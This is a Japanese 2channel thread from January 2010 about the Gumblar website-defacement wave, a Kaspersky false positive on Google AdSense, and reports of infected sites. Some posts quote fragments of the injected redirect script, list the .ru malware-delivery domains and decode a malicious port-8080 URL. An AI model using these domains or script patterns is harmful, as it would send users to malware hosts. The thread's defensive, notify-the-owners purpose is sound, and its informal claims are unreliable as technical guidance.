ぐぐるあどはってる有名サイトどこ
760名無しさん@お腹いっぱい。:2010/01/25(月) 17:30:10
利用者にことわりもなしに無断で広告表示するジャバスクリプトなんてウイルスとかわらんだろ
Googleアドセンスはウイルス扱いでいいよ
761名無しさん@お腹いっぱい。:2010/01/25(月) 17:33:20
RPC止めるなんて危険なことしないでRRASでいいんじゃん?
762名無しさん@お腹いっぱい。:2010/01/25(月) 17:33:44
カスペルスキー△「Googleはウイルス」
http://tsushima.2ch.net/test/read.cgi/news/1264408193/
763名無しさん@お腹いっぱい。:2010/01/25(月) 17:34:16
   ハ,,..,,ハ
  /;;・ω・;;ヽ 
.  (;( ^^^ );)
  `'ー---‐´
  _,,_ ∩
 (^Д^)/
 ⊂  ノ とったどー
  (つ ノ
  (ノ
764名無しさん@お腹いっぱい。:2010/01/25(月) 17:38:53
>>741のリンクは誤検出でFA?
765名無しさん@お腹いっぱい。:2010/01/25(月) 17:39:19
「Trojan.JS.Redirector.ar」でググると、もう142件もヒットするようにw
急上昇ワードでも15位に上がりました
766名無しさん@お腹いっぱい。:2010/01/25(月) 17:39:49
カスペのGoogleアドセンスは全部誤検出でしょ?
767名無しさん@お腹いっぱい。:2010/01/25(月) 17:42:41
カスペ公式フォーラムにきた
Googlesyndication - Trojan.JS.Redirector.ar - Kaspersky Lab Forum
http://forum.kaspersky.com/index.php?s=4121c48068e6c432d51f81acd9e8a4b8&showtopic=155383

カスペルスキーの30日体験版を使用しているのですが
Trojan.JS.Redirector.arというトロイの木馬が検出されるのですが削除できなくて困っています。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1235796827

「trojan.js.redirector」はトロイの木馬?
http://blogs.yahoo.co.jp/capdaikou/7469484.html
768名無しさん@お腹いっぱい。:2010/01/25(月) 17:46:20
Google AdSenseのヘルプフォーラム
Kaspersky Internet Security 2010でトロイの木馬と検知される
http://www.google.com/support/forum/p/adsense/thread?tid=5e14b46552f19fcb&hl=ja
769名無しさん@お腹いっぱい。:2010/01/25(月) 17:52:33
カスペって更新テストやってからファイル配信してないんじゃねーの?
こんなもんテストやってればすぐ気付くレベルだろ〜?
770名無しさん@お腹いっぱい。:2010/01/25(月) 18:00:22
>>730
かわゆすなぁ
771名無しさん@お腹いっぱい。:2010/01/25(月) 18:08:44
モフモフしそうだぎゃ
772名無しさん@お腹いっぱい。:2010/01/25(月) 18:13:10
ウィキペディアでGENO社員がGENOウイルスを隠している模様
http://tsushima.2ch.net/test/read.cgi/news/1264410510/
773名無しさん@お腹いっぱい。:2010/01/25(月) 18:27:59
× GENO
○ Gumblar
774名無しさん@お腹いっぱい。:2010/01/25(月) 18:37:34
ト、ト、トレンドマイクロのつ、つぎは
カ、カカ、カスペ・・・な、なんだなぁ〜
ぼぼぼ、ぼクはおむすび欲(ry+AA略
775名無しさん@お腹いっぱい。:2010/01/25(月) 18:54:53
また火狐野朗がなんかいっちゃってんのか
776名無しさん@お腹いっぱい。:2010/01/25(月) 18:57:08
>>772
またGENOか!
今ウイルスが蔓延したのはそいつらのせいといってもいいのに
あいつら全然反省してないんだな
もう業務停止命令出せや
777名無しさん@お腹いっぱい。:2010/01/25(月) 18:59:26 BE:452633292-PLT(12031)
そのりくつは おかしい
778名無しさん@お腹いっぱい。:2010/01/25(月) 19:08:25
RequestPolicyを押してるけど
外部ドメインじゃなきゃ安全とかよくいえるな
FTPのっとられてればなんでもできるっての
779名無しさん@お腹いっぱい。:2010/01/25(月) 19:09:35
>>736
このへんないきものは こっそりあなたのPCにいるのです。たぶん。
780名無しさん@お腹いっぱい。:2010/01/25(月) 19:22:40
>>779
なにそれこわい
781名無しさん@お腹いっぱい。:2010/01/25(月) 19:26:37
>>779
なにそれこわい


でも>>730のみたいなのが画面の中歩いてたら消さないだろうな
782名無しさん@お腹いっぱい。:2010/01/25(月) 19:30:25
衆議院議員トトロイ
www●kishida●gr●jp
/*Exception*/

関係無いけどGoLiveのゴミソース
<csscriptdict import>
<script type="text/javascript" src="file:///C:/Documents and Settings/ukkiy/Application Data/Adobe/Adobe GoLive/Settings/JScripts/GlobalScripts/CSScriptLib.js"></script>
</csscriptdict>

ukkiy逃げて〜
783名無しさん@お腹いっぱい。:2010/01/25(月) 19:39:36
784名無しさん@お腹いっぱい。:2010/01/25(月) 19:40:01
>>782
メールで対処お願いしました
とりあえずはトップページだけみたいですね
785名無しさん@お腹いっぱい。:2010/01/25(月) 19:41:18
>>783
民主の支部も改竄されなかったか?
786名無しさん@お腹いっぱい。:2010/01/25(月) 19:49:44
されとったな
787名無しさん@お腹いっぱい。:2010/01/25(月) 19:52:15
>>783は直リンしても大丈夫なの?
788名無しさん@お腹いっぱい。:2010/01/25(月) 19:53:17
>>666
家具が安くなるのはいいんだけど
まだ直ってないのね,そこ
789名無しさん@お腹いっぱい。:2010/01/25(月) 20:13:34
>>787
魚拓ページまでなら大丈夫
それ以上は感染対策してから池
790名無しさん@お腹いっぱい。:2010/01/25(月) 20:14:17
791名無しさん@お腹いっぱい。:2010/01/25(月) 21:00:06
最近よくGoogle先生喧嘩売られるね
792名無しさん@お腹いっぱい。:2010/01/25(月) 21:47:45
カスペ早く更新来てくれ
ギャーギャーうるせぇ
793名無しさん@お腹いっぱい。:2010/01/25(月) 22:05:34
>>792
カスペスレでやれ
【総合力で】Kaspersky Lab Part96【他社を圧倒】
http://pc11.2ch.net/test/read.cgi/sec/1261376321/
794名無しさん@お腹いっぱい。:2010/01/25(月) 22:14:09
tp://www●m-on●jp/でカスペがオブジェクト
tp://pagead2●googlesyndication●com/pagead/show_ads.js//show_adsから
Trojan.JS.Redirector.arを検出するんだが
>>698-699の通り誤検出ってことでいいのかな
795名無しさん@お腹いっぱい。:2010/01/25(月) 22:20:51
誤検出だからもうその話は終われ
23時頃修正くるらしいし
796名無しさん@お腹いっぱい。:2010/01/25(月) 22:38:15
>>795了解。
修正に期待。
797名無しさん@お腹いっぱい。:2010/01/25(月) 22:42:14

====以下誤検出スレ====
798名無しさん@お腹いっぱい。:2010/01/25(月) 22:52:35
まだ誤検出と決まったわけではない!
799名無しさん@お腹いっぱい。:2010/01/25(月) 23:38:30
800名無しさん@お腹いっぱい。:2010/01/26(火) 01:37:20
IEでセキュリティレベルを高にするとjavaが無効になる分、動画サイトが見れなくなっちゃうんだけど
特定のアドレスを指定して、そのページだけjavaが有効になるっていう設定ってできる?

たとえば、いつもはセキュリティレベル高だけど、ようつべだけはセキュリティレベル中(java有効)になるとか
毎回レベルを指定するのが面倒だ
801名無しさん@お腹いっぱい。:2010/01/26(火) 01:44:02
火狐とかならお気にいりに入れてるサイトごとにセキュリティ設定出来るよ
802名無しさん@お腹いっぱい。:2010/01/26(火) 01:44:59
サイト登録すれば言いだけ
火狐野朗の自演か
803名無しさん@お腹いっぱい。:2010/01/26(火) 01:46:23
IEでもな
804名無しさん@お腹いっぱい。:2010/01/26(火) 01:47:55
>>800
インターネットオプションのセキュリティで
信頼済みサイトに登録すればいける。

でも火狐やプニルの方が楽といえば楽かな。
805名無しさん@お腹いっぱい。:2010/01/26(火) 01:50:43
IEの良いところ : Firefoxをダウンロードできる
806名無しさん@お腹いっぱい。:2010/01/26(火) 01:51:28
javaいれてなくてIEでセキュリティ高にしてあっても動画サイト見れるんだけど
これってなんか設定間違ってるってこと?
807名無しさん@お腹いっぱい。:2010/01/26(火) 01:58:31
>>804
信頼済みサイトのセキュリティレベルを中にして
http://www.youtube.com/を追加したけど見れない

プニルの個別設定でようつべをjava有効にしてみたけど見れない

なぜだ……
808名無しさん@お腹いっぱい。:2010/01/26(火) 02:07:33
>>807
設定後、ブラウザ再起動した?
809名無しさん@お腹いっぱい。:2010/01/26(火) 02:08:20
また糞狐が変なこと言い出したのか
さすがテンプレでnoscriptだか宣伝するだけあるな
810名無しさん@お腹いっぱい。:2010/01/26(火) 02:12:18
>>808
した。だが見れない

つべ以外の動画サイトも登録してはみたが、新しいjavaを入れろと表示されるだけ
もちろん、javaは最新版にしてあるし、セキュリティレベルを中に設定すれば問題なく見れる
811名無しさん@お腹いっぱい。:2010/01/26(火) 02:16:53
youtubeにjavaなんか使ってるか
javascriptのこといってるのか
812名無しさん@お腹いっぱい。:2010/01/26(火) 02:17:28 BE:1584217297-PLT(12031)
>>810
http://gumblarchecker.crz.jp/defend.html#ieallow
特定のウェブページを許可する項目を作りました
813名無しさん@お腹いっぱい。:2010/01/26(火) 02:18:09
節子、それjavascriptやない
814名無しさん@お腹いっぱい。:2010/01/26(火) 02:18:59
IE系だと、javascriptとActiveXだろうと
815名無しさん@お腹いっぱい。:2010/01/26(火) 02:19:04
あなたチューブ
816名無しさん@お腹いっぱい。:2010/01/26(火) 02:21:56
>>807
js(ジャバスクリプト)とActiveXの実行許可した?
jsとJAVAは全くの別物で、ようつべはJAVA多分関係ないよw
817名無しさん@お腹いっぱい。:2010/01/26(火) 02:31:22
>>812
ようつべが見れました。ありがとう
しかし、相変わらず別の動画サイトは見れないorz
818名無しさん@お腹いっぱい。:2010/01/26(火) 03:06:39
>>817
こんな程度で躓いているならあなたには無理。
現在感染していなくて>>6の対策がきちんとできているならそのままでいいよ。
現状で>>6以上の対策は掛け捨て確実な保険というか、自己満足や趣味の領域だから。
819名無しさん@お腹いっぱい。:2010/01/26(火) 03:39:06
820名無しさん@お腹いっぱい。:2010/01/26(火) 03:39:40
IEは8?
821名無しさん@お腹いっぱい。:2010/01/26(火) 03:42:40
>>820
IE5です
822名無しさん@お腹いっぱい。:2010/01/26(火) 03:44:25
釣り乙
823名無しさん@お腹いっぱい。:2010/01/26(火) 03:46:04
>>822
マジレスなんだが・・・
824名無しさん@お腹いっぱい。:2010/01/26(火) 06:02:23
2kか9xかどっちかか?
825名無しさん@お腹いっぱい。:2010/01/26(火) 06:54:51
JavaScriptってレベルじゃねーぞ
ttp://www.chromeexperiments.com/
826名無しさん@お腹いっぱい。:2010/01/26(火) 06:56:23
IE5ってOS9ですか?
827名無しさん@お腹いっぱい。:2010/01/26(火) 06:57:46
JavaScriptってレベルじゃねーぞ
ttp://www.chromeexperiments.com/
828名無しさん@お腹いっぱい。:2010/01/26(火) 06:59:15
JavaScriptってレベルじゃねーぞ
ttp://www.chromeexperiments.com/
829名無しさん@お腹いっぱい。:2010/01/26(火) 07:06:09
誤爆スマソ
830名無しさん@お腹いっぱい。:2010/01/26(火) 08:31:26
ヤフーのブリーフケースからファイルを取り出そうとしたら
ノートンがTrojan.Malscript!htmlで反応したんだけど
感染してんのかな?それとも誤検?
831名無しさん@お腹いっぱい。:2010/01/26(火) 08:32:46
ノートンのサポートに訊けよ
832名無しさん@お腹いっぱい。:2010/01/26(火) 09:53:43
誤爆ってレベルじゃねーぞ
833名無しさん@お腹いっぱい。:2010/01/26(火) 15:47:48
>>830
virustotalに投げれば
834名無しさん@お腹いっぱい。:2010/01/26(火) 16:16:45
激安通販アラジン(/*Exception*/)
tp://toratomo●lovepop●jp/index/

さゆりちゃんの電気屋さん(/*Exception*/)
tp://electronics●sayurichan●com/

スニーカー通販(/*Exception*/)
momo-cafe●sunnyday●jp
トップページは403だが、該当ページにアクセス可能
/folder/sneaker
※ろりぽは事の重大さがわかってないらしい


調査に戻る..
835名無しさん@お腹いっぱい。:2010/01/26(火) 16:34:15
truelifefamily.ru
836名無しさん@お腹いっぱい。:2010/01/26(火) 17:32:10
ロリポとさくら大杉
というよりはロリポとさくらで調べて行ってるんだろうけどさ。

つーかロリポGMOだろ?
同じGMOのアイルでは「ガンブラー点検無償実施」とかやってるのに
つーかGMO自体がWebAlertってのやってんのに

やっぱ安物サーバーはこういう時にダメなんかねぇ。
837名無しさん@お腹いっぱい。:2010/01/26(火) 17:50:23
ユーザー層がアレだからだと思ってたw
838名無しさん@お腹いっぱい。:2010/01/26(火) 18:44:34
ExplorerにFTPのパス覚えさせてるような初心者が多いんだろう
839名無しさん@お腹いっぱい。:2010/01/26(火) 19:50:22
>>834
上:ろりぽにつーほー
中:403
下:そこも403になってました。
840名無しさん@お腹いっぱい。:2010/01/26(火) 20:33:44
   γ⌒ヽ
  < ・、,,,;;,)      ハ,,..,,ハ
  < つ=つ     /;;・ω・;;ヽ
  ノ   ノ三)     (;( ^^^ );)
∠、 m)=m)..    `'ー---‐´

 ガンブラー      トトロイ
(2009 〜 )      (2010 〜 )
841名無しさん@お腹いっぱい。:2010/01/26(火) 20:40:54
kawaii
842名無しさん@お腹いっぱい。:2010/01/26(火) 20:42:52
ハッカーってどうしてマウス使わないの?
843名無しさん@お腹いっぱい。:2010/01/26(火) 21:01:00
>>782
他人に迷惑かけておいてスクロールしなければ見えないところに告知してんなよ。
自分のことしか考えていないクソ政治家が露呈しているわ。
844名無しさん@お腹いっぱい。:2010/01/26(火) 21:02:29
>>843
ならば君が政治家になりたまえ
845名無しさん@お腹いっぱい。:2010/01/26(火) 21:23:12
まぁ通知すらしない企業だってあるんだし
846名無しさん@お腹いっぱい。:2010/01/26(火) 21:37:05
嫌な言い方
847名無しさん@お腹いっぱい。:2010/01/26(火) 22:11:02
サッカーマガジンの旧ページ(今は移転告知と転送だけ)
ttp://soccer.hikaritv-bbm●com/
848名無しさん@お腹いっぱい。:2010/01/26(火) 22:16:20
 
849名無しさん@お腹いっぱい。:2010/01/26(火) 22:56:15
>>847
whoisからべーすぼーるまがじんにめるしますた。
850名無しさん@お腹いっぱい。:2010/01/26(火) 23:27:33
>>849,839
乙です
851名無しさん@お腹いっぱい。:2010/01/26(火) 23:38:31
【セキュリティ】Gumblarの新しい亜種が突出、感染サイトの4割で検出(10/01/26)
http://pc11.2ch.net/test/read.cgi/pcnews/1264516499/
852名無しさん@お腹いっぱい。:2010/01/27(水) 01:18:54
わざと感染して、いろんなところにFTPアクセスすれば
Gumblarも混乱するんじゃ?
853名無しさん@お腹いっぱい。:2010/01/27(水) 01:22:16
>>852
全部書き換えられるのが落ち
854名無しさん@お腹いっぱい。:2010/01/27(水) 01:48:42
GENOみたいにweb改竄で感染させて ハードディスクフォーマットさせるウイルスってあるの?
855名無しさん@お腹いっぱい。:2010/01/27(水) 03:44:13
さくらオワタwww
ttp://www.google.com/safebrowsing/diagnostic?site=sakura.ne.jp&hl=ja
過去 90 日間に、このサイトの一部で不審な動きが 66 回報告されています。
Google による巡回テスト状況
このサイトで過去 90 日間に Google がテストした 6048 ページのうち
241 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、
インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは2010-01-26で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-26です。

不正なソフトウェアは (省略) を含む
135 個のドメインでホストされています。

(省略) を含む 20 個のドメインが、
このサイトの訪問者に不正なソフトウェアを
配布する媒体として機能しているようです。


ろりぽっぷ
ttp://www.google.com/safebrowsing/diagnostic?site=lolipop.jp&hl=ja
856名無しさん@お腹いっぱい。:2010/01/27(水) 04:16:32
KKJサイトにおける不正改ざんについての状況報告とお願い
ttp://www.kkj.or.jp/0120_info.php
お詫びは良いけどさ・・・

>【GENOウイルスチェッカー】
>ttp://geno.2ch.tc/



マスゴミがGumblarと8080を混同して報道したのが原因だろうな。
857名無しさん@お腹いっぱい。:2010/01/27(水) 05:35:31
>>856

ここもそうだよ
http://ameblo.jp/naturalhouse-shonan/entry-10438277179.html

なぜにブログで告知する…はおいといて

> ★ウィルス対策や駆除の方法
> ⇒コチラ のサイトに詳しく載っております。
>  所要時間はたったの5分です。

コチラ のサイト(どうしてそこ行く)
http://blog.ecstudio.jp/ec_studio_blog/090522geno-virus.html
858名無しさん@お腹いっぱい。:2010/01/27(水) 05:41:07
新種の告知かな
ttp://www●mag-x●com/
859名無しさん@お腹いっぱい。:2010/01/27(水) 06:23:51
>>858
改ざんされてる?
860名無しさん@お腹いっぱい。:2010/01/27(水) 06:33:32
糞チェッカーは糞
861名無しさん@お腹いっぱい。:2010/01/27(水) 07:06:38
>>859
サイトリニューアル

> 年末年始にかけて2週間のサイト閉鎖を行い、さらに、1月22日から25日まで、
> 部分的にページが見られなくなっておりましたこと、深くお詫びいたします。
> その後システムの調査をしましたところ、会員情報に関しては、漏洩の事実
> が認められなかったことを、ここにご報告させていただきます。

ウイルス感染問題はウヤムヤ
862名無しさん@お腹いっぱい。:2010/01/27(水) 07:56:35
>>861
レスありがとう
863名無しさん@お腹いっぱい。:2010/01/27(水) 09:20:21
>>857
コメントにSo-netセキュリティ通信のURLでも書いておこうかと思ったけど

>お互いに「アナログ人間万歳☆」ですね?!

これみて萎えた。
864名無しさん@お腹いっぱい。:2010/01/27(水) 10:02:22
知能テストに見せかけHDDのデータを破壊、危険なワームが拡大
HDDの重要な部分を破壊してしまう新手のワーム「Zimuse」が世界各地で感染を広げているという。
2010年01月27日 08時09分 更新
http://www.itmedia.co.jp/news/articles/1001/27/news022.html

Web知能テストに見せかけHDDのデータを破壊する粋なウィルスが登場
http://tsushima.2ch.net/test/read.cgi/news/1264552887/
865856:2010/01/27(水) 14:25:59
>>857
>コチラ のサイト(どうしてそこ行く)
>http://blog.ecstudio.jp/ec_studio_blog/090522geno-virus.html

このブログ自体は既出だが・・・
Java(JRE)の事が抜けてるから、環境次第では穴が空いたままになる可能性がw

http://minkara.carview.co.jp/userid/666259/blog/16527332/
何故か人気がある社長の糞ブログwww

さすがみんカラー
※みんな頭カラッポ=略して「みんカラ」
866名無しさん@お腹いっぱい。:2010/01/27(水) 14:42:54
>>865
そのブログにコメント出してたら消されてるなw
867名無しさん@お腹いっぱい。:2010/01/27(水) 15:30:37
T-fal(ティファール)ウェブサイトご利用のみなさまへ

いつもT-falのウェブサイトをご利用くださいましてありがとうございます。
現在サイト内において、ページによって表示されにくい個所がございます。
ただ今改善の作業を進めておりますが、完全な復旧まで今しばらくお待ち
いただけます様、よろしくお願い申し上げます。

株式会社 グループセブ ジャパン

http://www.t-fal.co.jp/

ここのサイトも感染したのかな?
868名無しさん@お腹いっぱい。:2010/01/27(水) 15:58:24
>※みんな頭カラッポ=略して「みんカラ」

ワロタ
オカルトグッズが蔓延するサイトだからなぁ・・・
869名無しさん@お腹いっぱい。:2010/01/27(水) 16:02:06
ソースに記載のある
/krups/js/xtplugar.js
/krups/js/xtplug.js
が404になってる。改ざんされて消したのかもね。
870名無しさん@お腹いっぱい。:2010/01/27(水) 16:20:33
>>867
DoS攻撃くらってテンポってるだけじゃね?

【調理器具】ティファールの鍋、取っ手外れやけど 同様の事故3件 [10/01/26]
http://anchorage.2ch.net/test/read.cgi/bizplus/1264514894/
871名無しさん@お腹いっぱい。:2010/01/27(水) 16:41:20
BLOGって感染しないよね
872名無しさん@お腹いっぱい。:2010/01/27(水) 16:47:47
ティファールは前にも改ざんされたからね
873名無しさん@お腹いっぱい。:2010/01/27(水) 16:48:59
>>871
SQLインジェクション

あ、トレンドマイクロ的な意味じゃなくて
874名無しさん@お腹いっぱい。:2010/01/27(水) 17:22:52
これはひどい(アフィ的な意味で)
symantecgam.seesaa.net
875人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 17:31:35
WindowsXP
Windows98
Ubuntu 9.10

どれがいいんだろう
876名無しさん@お腹いっぱい。:2010/01/27(水) 17:34:28
>>875
Windows95
877名無しさん@お腹いっぱい。:2010/01/27(水) 17:34:55
ttp://www●mv-tokai●com/

nortonのアドオンが検出
これは改竄ですかね?(もしくは過去に改竄されていた?)
878人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 17:37:53
>>876
持ってない
よし、Windows98(アンチウイルスソフトなし)で踏んでこよう
879名無しさん@お腹いっぱい。:2010/01/27(水) 17:40:42
>>877
ざっと見た限りでは、少なくとも今は改竄は無いっぽい
キャッシュ見て来ます
880名無しさん@お腹いっぱい。:2010/01/27(水) 17:43:04
1月12日に「お詫びとお知らせ」pdfファイルがあった

スナック菓子に針1本混入だった
881877:2010/01/27(水) 17:44:50
malscript扱いになってるけどキャッシュのどこかに反応したっぽい
トップページでは出ないっす
882879:2010/01/27(水) 17:52:30
GoogleとBingのキャッシュ見たけどよく分からんかった
どこにひっかかってるんだろう…aguseでも反応無いけど
883名無しさん@お腹いっぱい。:2010/01/27(水) 17:59:03
>>882
今確認してみたらyahooのキャッシュでTrojan.Malscript!htmlと出ました
884名無しさん@お腹いっぱい。:2010/01/27(水) 18:04:16
あれ・・これは
ページ関係なしにyahoofs.jp(yahooのキャッシュ)自体が反応しているみたいだけど
これはnortonの駄目機能の誤爆かな
吊ってこようorz
885名無しさん@お腹いっぱい。:2010/01/27(水) 18:05:35
886名無しさん@お腹いっぱい。:2010/01/27(水) 18:05:54
カスペがGoogleに喧嘩売ったと思ったら
今度はノートンがYahoo!に喧嘩売ったのかw
887名無しさん@お腹いっぱい。:2010/01/27(水) 18:08:18
カスペは即日修正したがノートンは違うな
888名無しさん@お腹いっぱい。:2010/01/27(水) 18:13:30
まぁ24時間は様子見ようぜ。
あっちのYahoo!とYahoo!Japanとでスクリプト等が異なると対応は遅くなるだろうな。
889人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 18:16:53
890名無しさん@お腹いっぱい。:2010/01/27(水) 18:31:59
ノートンのネーミングは相当アバウトっつーか広範囲すぎるので
それでググってもあまり意味ないぞ
891名無しさん@お腹いっぱい。:2010/01/27(水) 18:34:26
892名無しさん@お腹いっぱい。:2010/01/27(水) 18:57:05
>>884
なに?よく分からないけどヤフーのトップページ見ただけでもノートン反応するって事?
俺のNIS2009は何も反応しないけど
893名無しさん@お腹いっぱい。:2010/01/27(水) 19:10:20
>>892
反応するのはyahooのキャッシュ鯖
検索したページをキャッシュ表示すると出る
894名無しさん@お腹いっぱい。:2010/01/27(水) 19:15:27
895名無しさん@お腹いっぱい。:2010/01/27(水) 19:19:52
>>893
ありがとう、何も反応しないや、おかしいな
896名無しさん@お腹いっぱい。:2010/01/27(水) 19:26:32
>>895
NIS2010は2009のマイナーバージョンアップに見えて全くの別物仕様だからね
ただ現状の最新エンジンには環境依存の不具合があってうざい事この上ない
897名無しさん@お腹いっぱい。:2010/01/27(水) 20:23:47
>>894
これだけ感染を繰り返すのは更新に使用しているパソコンからウィルス駆除してないんじゃないのか。あとサーバレンタル元に連絡して一時閉鎖とかの対応取って貰うとかしないと駆除と感染のいたちごっこが続きそう
898名無しさん@お腹いっぱい。:2010/01/27(水) 20:49:25
ttp●//kousyu●cool●ne●jp/

MSEで"Trojan:JS/Redirector.BQ"と出たがGumblar?
899名無しさん@お腹いっぱい。:2010/01/27(水) 20:51:48
>>898
/*Exception*/
900名無しさん@お腹いっぱい。:2010/01/27(水) 21:01:49
>>899 thx

MyJVN バージョンチェッカで各ソフトは最新になってるけど大丈夫かな・・・
901名無しさん@お腹いっぱい。:2010/01/27(水) 21:44:54
口唇ヘルペスの治療や症状
www●pdmounted●com

リアルに感染中/*Exception*/
902名無しさん@お腹いっぱい。:2010/01/27(水) 21:49:29
>>898
めるした。

>>897
言いだしっぺの法貝リ
お願いします。m(_ _)m
903名無しさん@お腹いっぱい。:2010/01/27(水) 22:18:03
>>901
whoisからめるしました。
904名無しさん@お腹いっぱい。:2010/01/27(水) 22:36:57
Gumblar蔓延の要因の一つは感染サイトの告知の中の
トレンドマイクロのオンラインシュキャンの進めにあると思われます

トレンドマイクロの営利主義と感染サイトの告知が
感染PCを安全としGumblar蔓延を促進しているのではなかろうかと

PCデポでは無料診断と称してトレンドマイクロのオンラインシュキャンを行っていますが
これは、PCデポとトレンドマイクロの密接な繋がり上行われているものであり
安易にユーザに間違った安心感だけを与えているいるだけかと

PCがGumblarに感染しているか否かを真剣に診断しているとは
断じて言えるものでは無いのだとw
905名無しさん@お腹いっぱい。:2010/01/27(水) 22:39:10
シュキャンorz
906名無しさん@お腹いっぱい。:2010/01/27(水) 22:41:09
シュキャンダル
907名無しさん@お腹いっぱい。:2010/01/27(水) 22:48:36
>>897
パスワードすら変えてないんじゃないの。

しかし感染を告知しないで有料会員に感染者がいたらどうする気なんだろう。
気がつかずにいたら余計に被害が出るかもしれないのにいろんな意味で凄いわ。
908名無しさん@お腹いっぱい。:2010/01/27(水) 22:58:47
909名無しさん@お腹いっぱい。:2010/01/27(水) 23:26:30
ニュースでHPが改竄されたって言ってるじゃん。
あれって本当なの?
ハッカーが直接アクセスして改竄してるの?
てっきりウイルスがHP管理者のPCから勝手に
改竄してるんだと思ってたんだけど。
910名無しさん@お腹いっぱい。:2010/01/27(水) 23:29:05
ウイルスバスターのファイルスキャンで安心とか、アホだろ・・・
いや、うちのサイトのせいで、感染していないと言い張るためにわざとなのか?
911名無しさん@お腹いっぱい。:2010/01/27(水) 23:49:17
>>909
本当
直接アクセスって意味がわかってないと思うけどFTPで直接
管理者のPCがウイルス感染してることも事実だけどそこから改ざんではないです
912名無しさん@お腹いっぱい。:2010/01/28(木) 00:11:43
>>911
うむうむ。
改竄の原因はウイルスではないのね。
913名無しさん@お腹いっぱい。:2010/01/28(木) 03:05:57
埋め込まれるスクリプトでコメント無しのがあるそうで
<script> try{window.onload=function(){document.write('<div id=megaid>

で、このへんに飛ばされるらしい
extrafreeweb.ru
limowebcam.ru
supernetbet.ru
topmediasite.ru
yourtopfilms.ru
914名無しさん@お腹いっぱい。:2010/01/28(木) 03:30:26
それで突かれる脆弱性は何?
先週のIEのを含めて既知のものというか、普通にアップデートを怠らなければ問題ないのなら
コードの変更みたいな些事はもうどうでもいいよ。
915名無しさん@お腹いっぱい。:2010/01/28(木) 03:50:13
勝手に仕切るなw
916名無しさん@お腹いっぱい。:2010/01/28(木) 03:53:03
普通にアップデートを怠らなければ問題ない
917名無しさん@お腹いっぱい。:2010/01/28(木) 04:06:53
>>916
フツーはそうなんだけど今回アドビがねぇ。
0-day発覚から一ヶ月放置。
そのせいだろ今回の騒動は。
918名無しさん@お腹いっぱい。:2010/01/28(木) 04:14:43
アドビのjavascriptなんかデフォルトで無効にしとけっての
919名無しさん@お腹いっぱい。:2010/01/28(木) 06:46:27
感染したら
netstat -ap tcp 10
で監視できないのかな
920名無しさん@お腹いっぱい。:2010/01/28(木) 07:41:10
>>914
ソース見てコードないの確認してからNS許可してるんで、変更情報は自分には重要。
921名無しさん@お腹いっぱい。:2010/01/28(木) 09:17:45
>>908
askul代理店、まだ残ってんのか。
LGPL...
922名無しさん@お腹いっぱい。:2010/01/28(木) 10:15:09
新しい?
<script> try{window.onload=function(){document.write('<div id=megaid>addictinggames-com.z5x.ne</div>');以下長文略
923922:2010/01/28(木) 10:17:46
これに掛かると、サイトは真っ白になって
addictinggames-com.z5x.neとだけ表示される
924名無しさん@お腹いっぱい。:2010/01/28(木) 11:08:08
>>916
「普通にアップデート」したら、913のスクリプトが動かなくなるの?
それとも、このスクリプトの飛び先にある毒から守られるの?
925名無しさん@お腹いっぱい。:2010/01/28(木) 11:09:52
/*・・・*/無し最新型はDEBUG(仮称)と記す

伊豆諸島/伊豆大島/大島町/TOP/総合情報(DEBUG)
tp://park5●wakwak●com/~izushichi/oshima/index●html
※/~izushichi/mikura/index●htmlなど、複数あり

大田鋼業株式会社(DEBUG)
tp://www.oota●co●jp/index●html

RONI大好きサイト(Exception)
tp://roni●roselog●net

いろいろテスト(Exception)
tp://test●roselog●net/

テレ東アニメDVD通販情報(たぶんDEBUG)
tp://anime●gyomu-yo●net/
※絶賛崩壊中w

スズキの中古車探し(DEBUG)
tp://sunrise●2pg●in/suzukiucar/index2●html
※コードまる見えw

各所につーほヨロ
また潜りに逝ってくる・・・
926名無しさん@お腹いっぱい。:2010/01/28(木) 11:18:05
価格比較 GIOS ジオス(崩壊仕様)
tp://shop●relax-living●net
※/bike11/にGNU GPL

エラー崩壊は新コードの挿入ミスかな?
927名無しさん@お腹いっぱい。:2010/01/28(木) 11:26:29
>>925
大田鋼業株式会社

電話に出たババア
「私たちにはそんなことは分かりません」とガチャ切り w
928名無しさん@お腹いっぱい。:2010/01/28(木) 11:44:14
>>927
マジかwひでぇ会社だw
929名無しさん@お腹いっぱい。:2010/01/28(木) 11:50:57
>>927
ふいたwwww
930名無しさん@お腹いっぱい。:2010/01/28(木) 11:51:13
>>927
ちょwww
931名無しさん@お腹いっぱい。:2010/01/28(木) 11:56:43
従業員10名の零細企業だからそんなもんだろ
932名無しさん@お腹いっぱい。:2010/01/28(木) 11:57:01
>>864
エストニアのESET?
933名無しさん@お腹いっぱい。:2010/01/28(木) 11:57:34
社内ネットワーク内のPCからFTPでアップロードしている場合、
そのPCが感染して無くても他のPCが感染してたらパス抜かれる?
934名無しさん@お腹いっぱい。:2010/01/28(木) 12:10:33
>>931
だからってガチャ切りは普通しないだろ
935名無しさん@お腹いっぱい。:2010/01/28(木) 12:13:19
詐欺とか思われたんだろ
aguseで調べるとタイムアウトだらけだ
936名無しさん@お腹いっぱい。:2010/01/28(木) 12:26:58
大田鋼業株式会社(笑)のコードだが

tp://counterbest●ru:DEBUG/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/

replace(/DEBUG/g, '8080')

tp://counterbest●ru:8080/wiktionary●org/wiktionary●org/sweetim●com/nhl●com/google●com/

この認識で良いのかな?
937名無しさん@お腹いっぱい。:2010/01/28(木) 12:30:07
闇金業者の融資だと思われたんだな
938名無しさん@お腹いっぱい。:2010/01/28(木) 12:41:31
例どんな相手でも普通の企業でガチャ切りなんてありえん
939名無しさん@お腹いっぱい。:2010/01/28(木) 13:03:43
立て続けに何人もの「善意の第三者」から掛かってきていたとか
940名無しさん@お腹いっぱい。:2010/01/28(木) 13:10:43
KDDIのマイライン勧誘電話はガチャ切りしてる。
そうしないと延々喋り続けるから。
941名無しさん@お腹いっぱい。:2010/01/28(木) 14:32:18
いやいや町工場とか土建屋なんかそんな対応がデフォだぞ
942名無しさん@お腹いっぱい。:2010/01/28(木) 15:10:44
